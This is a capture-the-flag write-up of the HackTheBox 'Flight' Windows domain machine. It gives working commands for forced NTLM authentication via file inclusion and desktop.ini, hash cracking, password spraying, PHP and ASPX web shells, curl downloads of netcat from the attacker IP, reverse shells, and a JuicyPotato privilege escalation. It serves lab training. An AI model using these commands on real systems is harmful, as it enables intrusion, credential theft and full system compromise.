HackTheBox — Flight

ARZ101
7 min readMay 6, 2023

--

Flight from HackTheBox which involved Forced NTLM Authentication, getting svc_apache’s hash, password spraying on the enumerated usernames will lead us to S.moon which had write access to Shared share allowing us to upload a desktop.ini and again performing forecd authentication to get c.bum’s hash, this user had access to web directory through smb allowing us to upload a php file giving us command execution as svc_apache, on enumerating local ports, port 8000 was running and hosting the directory from C:\inetpub\development, on uploading an aspx file they returned us commands running in context of iis appol , a service account which had SeImpersonate privileged enabled which can be abused through Juicy-Potato to get system shell.

NMAP

Nmap scan report for 10.10.11.187    
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 139/445 (SMB)

Checking null authentication on SMB shows that we can’t access any share through anonymously

PORT 80 (HTTP)

The site didn’t had anything there as it was just a page with no links also gobuster didn't showed anything interesting to as well

So adding flight.htb in /etc/hosts file as we can see the domain name at the bottom of the page

Fuzzing for subdomains using wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb"  --hh 7069

Adding this subdomain in hosts file and accessing the site

Checking for Local File Inclusion it filters .. if it's in the url but allows /

Foothold (Svc_apache)

Running wfuzz again to fuzz for LFI payloads we find that we can just specify a file name without using ..

Let’s verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and use responder to capture NTLMv2 hash

We have a hit so now running responder and accessing a fake share with //IP/share

responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu

Saving this hash in a file cracking it with john

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

With the valid credentials we can start enumerating the shares and usernames through crackmapexec

Using enum4linux to query usernames and filtering usernames so that we can password spray on them

enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt

S.moon

Using either cme or kerbrute to perform password spary we’ll get S.Moon having the same password

kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

Checking shares with s.moon, we see that we have write access on `shared`

C.bum

On uploading .scf file extension to perform forced authentication it didn't allowed us to upload that extension, not sure why

But on uploading desktop.ini file it worked

[.ShellClassInfo]
IconResource=\\10.10.14.28\aa

Cracking this hash again with john

Foothold

This user has write access on web share which means that we can upload php file which will be reflected on schooled.flight.htb

Uploading a php file calling phpinfo()

<?php phpinfo(); ?>

Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it

http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe

http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe

Since we already have credentials of c.bum we can execute commands through that user using RunasC.exe

.\RunasCs.exe c.bum Tikkycoll_431012284 whoami

Running netstat, we’ll see that there’s port 8000 open locally

Port forwarding port 8000 using chisel

chisel server --reverse -p 8001

And running the client on the target machine

.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000

Accessing the port on our browser shows that access is denied

But this shows the path where the directory is hosted, C:\inetpub\Development

In this folder, there are few html files

Running icacls on the development folder shows that c.bum has write access

Using RunasCs we can switch user as c.bum and transfer aspx shell in that directory

.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'

Accessing the file through the browser

I tried executing nc.exe to get a reverse shell but it wasn’t working for some reason so instead I generated a msfvenom payload

Transfer it and execute it

On checking privileges of iis appol , SeImpersonate was enabled

To abuse this, we can use JuicyPotato-ng to get a system shell

.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"

References

--

--